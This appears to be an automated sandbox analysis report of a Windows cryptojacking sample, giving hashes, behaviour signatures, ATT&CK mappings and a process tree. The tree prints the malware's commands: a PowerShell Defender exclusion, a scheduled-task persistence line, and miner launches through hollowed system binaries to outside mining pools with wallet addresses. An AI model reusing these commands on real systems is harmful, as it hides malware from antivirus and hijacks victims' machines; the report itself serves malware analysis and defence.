2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536

Analysis

max time kernel
297s
max time network
297s
platform
windows10-1703_x64
resource
win10-20220901-en
resource tags

arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
submitted
24/09/2022, 22:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536.exe
Size

861KB
MD5

2d0b3156196bbd5df81d32c03fbb50ec
SHA1

2c0f76119a6f47ab0512cc7511213a75f8ad04c3
SHA256

2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536
SHA512

8011935ea774ecc5e1c3ba3bbc8d788b49eedbebb4422fb0c29e4967439b51b22986d12d9ba1996469face07a227517f57e88ff8766e41354b982ddc42ca1260
SSDEEP

6144:PvziFSXpvg8dhIheZZ1IZfgo7bx2jC/Yx4n0fdWHqqEXgiKJ2wm3sQLU8uZq1QNM:1Zv0ozIiYbIb4lHc/a0YZg9Bj

Score

8^/10

upx

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
4308	DHUZT.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2336-205-0x0000000140000000-0x0000000142EFE000-memory.dmp	upx
behavioral2/memory/2336-207-0x0000000140000000-0x0000000142EFE000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4308 set thread context of 4712	4308	DHUZT.exe	79
PID 4308 set thread context of 2336	4308	DHUZT.exe	82

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4932	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4352	timeout.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
1488	powershell.exe
1488	powershell.exe
1488	powershell.exe
452	powershell.exe
452	powershell.exe
452	powershell.exe
4308	DHUZT.exe
4308	DHUZT.exe

Suspicious use of AdjustPrivilegeToken 46 IoCs

description	pid	Process
Token: SeDebugPrivilege	3520	2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536.exe
Token: SeDebugPrivilege	1488	powershell.exe
Token: SeIncreaseQuotaPrivilege	1488	powershell.exe
Token: SeSecurityPrivilege	1488	powershell.exe
Token: SeTakeOwnershipPrivilege	1488	powershell.exe
Token: SeLoadDriverPrivilege	1488	powershell.exe
Token: SeSystemProfilePrivilege	1488	powershell.exe
Token: SeSystemtimePrivilege	1488	powershell.exe
Token: SeProfSingleProcessPrivilege	1488	powershell.exe
Token: SeIncBasePriorityPrivilege	1488	powershell.exe
Token: SeCreatePagefilePrivilege	1488	powershell.exe
Token: SeBackupPrivilege	1488	powershell.exe
Token: SeRestorePrivilege	1488	powershell.exe
Token: SeShutdownPrivilege	1488	powershell.exe
Token: SeDebugPrivilege	1488	powershell.exe
Token: SeSystemEnvironmentPrivilege	1488	powershell.exe
Token: SeRemoteShutdownPrivilege	1488	powershell.exe
Token: SeUndockPrivilege	1488	powershell.exe
Token: SeManageVolumePrivilege	1488	powershell.exe
Token: 33	1488	powershell.exe
Token: 34	1488	powershell.exe
Token: 35	1488	powershell.exe
Token: 36	1488	powershell.exe
Token: SeDebugPrivilege	4308	DHUZT.exe
Token: SeDebugPrivilege	452	powershell.exe
Token: SeIncreaseQuotaPrivilege	452	powershell.exe
Token: SeSecurityPrivilege	452	powershell.exe
Token: SeTakeOwnershipPrivilege	452	powershell.exe
Token: SeLoadDriverPrivilege	452	powershell.exe
Token: SeSystemProfilePrivilege	452	powershell.exe
Token: SeSystemtimePrivilege	452	powershell.exe
Token: SeProfSingleProcessPrivilege	452	powershell.exe
Token: SeIncBasePriorityPrivilege	452	powershell.exe
Token: SeCreatePagefilePrivilege	452	powershell.exe
Token: SeBackupPrivilege	452	powershell.exe
Token: SeRestorePrivilege	452	powershell.exe
Token: SeShutdownPrivilege	452	powershell.exe
Token: SeDebugPrivilege	452	powershell.exe
Token: SeSystemEnvironmentPrivilege	452	powershell.exe
Token: SeRemoteShutdownPrivilege	452	powershell.exe
Token: SeUndockPrivilege	452	powershell.exe
Token: SeManageVolumePrivilege	452	powershell.exe
Token: 33	452	powershell.exe
Token: 34	452	powershell.exe
Token: 35	452	powershell.exe
Token: 36	452	powershell.exe

Suspicious use of WriteProcessMemory 37 IoCs

description	pid	Process	procid_target
PID 3520 wrote to memory of 1488	3520	2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536.exe	66
PID 3520 wrote to memory of 1488	3520	2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536.exe	66
PID 3520 wrote to memory of 4740	3520	2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536.exe	68
PID 3520 wrote to memory of 4740	3520	2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536.exe	68
PID 4740 wrote to memory of 4352	4740	cmd.exe	70
PID 4740 wrote to memory of 4352	4740	cmd.exe	70
PID 4740 wrote to memory of 4308	4740	cmd.exe	72
PID 4740 wrote to memory of 4308	4740	cmd.exe	72
PID 4308 wrote to memory of 452	4308	DHUZT.exe	73
PID 4308 wrote to memory of 452	4308	DHUZT.exe	73
PID 4308 wrote to memory of 2240	4308	DHUZT.exe	75
PID 4308 wrote to memory of 2240	4308	DHUZT.exe	75
PID 2240 wrote to memory of 4932	2240	cmd.exe	77
PID 2240 wrote to memory of 4932	2240	cmd.exe	77
PID 4308 wrote to memory of 4712	4308	DHUZT.exe	79
PID 4308 wrote to memory of 4712	4308	DHUZT.exe	79
PID 4308 wrote to memory of 4712	4308	DHUZT.exe	79
PID 4308 wrote to memory of 4712	4308	DHUZT.exe	79
PID 4308 wrote to memory of 4712	4308	DHUZT.exe	79
PID 4308 wrote to memory of 4712	4308	DHUZT.exe	79
PID 4308 wrote to memory of 4712	4308	DHUZT.exe	79
PID 4308 wrote to memory of 4712	4308	DHUZT.exe	79
PID 4308 wrote to memory of 4712	4308	DHUZT.exe	79
PID 4308 wrote to memory of 4712	4308	DHUZT.exe	79
PID 4308 wrote to memory of 4712	4308	DHUZT.exe	79
PID 4308 wrote to memory of 4712	4308	DHUZT.exe	79
PID 4308 wrote to memory of 4712	4308	DHUZT.exe	79
PID 4308 wrote to memory of 4712	4308	DHUZT.exe	79
PID 4712 wrote to memory of 4844	4712	vbc.exe	80
PID 4712 wrote to memory of 4844	4712	vbc.exe	80
PID 4308 wrote to memory of 2336	4308	DHUZT.exe	82
PID 4308 wrote to memory of 2336	4308	DHUZT.exe	82
PID 4308 wrote to memory of 2336	4308	DHUZT.exe	82
PID 4308 wrote to memory of 2336	4308	DHUZT.exe	82
PID 4308 wrote to memory of 2336	4308	DHUZT.exe	82
PID 4308 wrote to memory of 2336	4308	DHUZT.exe	82
PID 4308 wrote to memory of 2336	4308	DHUZT.exe	82

C:\Users\Admin\AppData\Local\Temp\2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536.exe
"C:\Users\Admin\AppData\Local\Temp\2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3520
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpBD2A.tmp.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4740
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:4352
- - C:\ProgramData\ccl\DHUZT.exe
    "C:\ProgramData\ccl\DHUZT.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4308
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:452
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2240
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:4932
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RGvbrbsSuWBAhQiVVqYY73R6VMCC1AwQYi.NewWorker -p x -t 7
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4712
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:4844
  - - C:\Windows\explorer.exe
      C:\Windows\explorer.exe --algo AUTOLYKOS2 --pool stratum-ergo.flypool.org:3333 --user 9iBvw2uK1JJsATyKTNiKktuaQoekhEZFedBvKvsoL36t4dsjmLu.apocalypse
      4⤵
      PID:2336

C:\ProgramData\ccl\DHUZT.exe
C:\ProgramData\ccl\DHUZT.exe
1⤵
PID:2272

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\ccl\DHUZT.exe

Filesize
861KB

MD5
2d0b3156196bbd5df81d32c03fbb50ec

SHA1
2c0f76119a6f47ab0512cc7511213a75f8ad04c3

SHA256
2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536

SHA512
8011935ea774ecc5e1c3ba3bbc8d788b49eedbebb4422fb0c29e4967439b51b22986d12d9ba1996469face07a227517f57e88ff8766e41354b982ddc42ca1260

Download Submit
C:\ProgramData\ccl\DHUZT.exe

Filesize
861KB

MD5
2d0b3156196bbd5df81d32c03fbb50ec

SHA1
2c0f76119a6f47ab0512cc7511213a75f8ad04c3

SHA256
2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536

SHA512
8011935ea774ecc5e1c3ba3bbc8d788b49eedbebb4422fb0c29e4967439b51b22986d12d9ba1996469face07a227517f57e88ff8766e41354b982ddc42ca1260

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
df9176ba4a6df2be980bd74fdf4299fc

SHA1
20a4c958c461b9b8d9977ba204b06805a11e8404

SHA256
c1aa10415470af1f40241f0913e878562e0acf1e02c0e7a2a8f6fa01b7d8ce13

SHA512
9c3fb71d593f990c5d929e949a0230e1a3c8394583dcfb9db96c70c02f7a9eb0aaa659dfefd209c711f3ac20eac288c193ed804a671071bc2188906399f7a0d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpBD2A.tmp.bat

Filesize
137B

MD5
d8ea14349045aec71a6496d32f593a1a

SHA1
5fae4c102980aacc35808ce354157bb46e055dc0

SHA256
41ebbecf98a38c62e48b06e08216af754437a5b3698c1b3363f3a867efc00561

SHA512
6ece988118433ef03bc980db0f09e897167dbb633419a34e1ed66ca6ce88841e0a9f1889dd021bbd07a46a226b8aa8221b00ca160e46ae7f62208cb5ab2d00b6

Download Submit
memory/1488-126-0x000002856DE40000-0x000002856DE62000-memory.dmp

Filesize
136KB

Download
memory/1488-129-0x000002856E280000-0x000002856E2F6000-memory.dmp

Filesize
472KB

Download
memory/2336-207-0x0000000140000000-0x0000000142EFE000-memory.dmp

Filesize
47.0MB

Download
memory/2336-205-0x0000000140000000-0x0000000142EFE000-memory.dmp

Filesize
47.0MB

Download
memory/3520-117-0x0000000000D60000-0x0000000000E3C000-memory.dmp

Filesize
880KB

Download
memory/4712-203-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/4712-200-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/4712-201-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/4712-204-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/4712-198-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download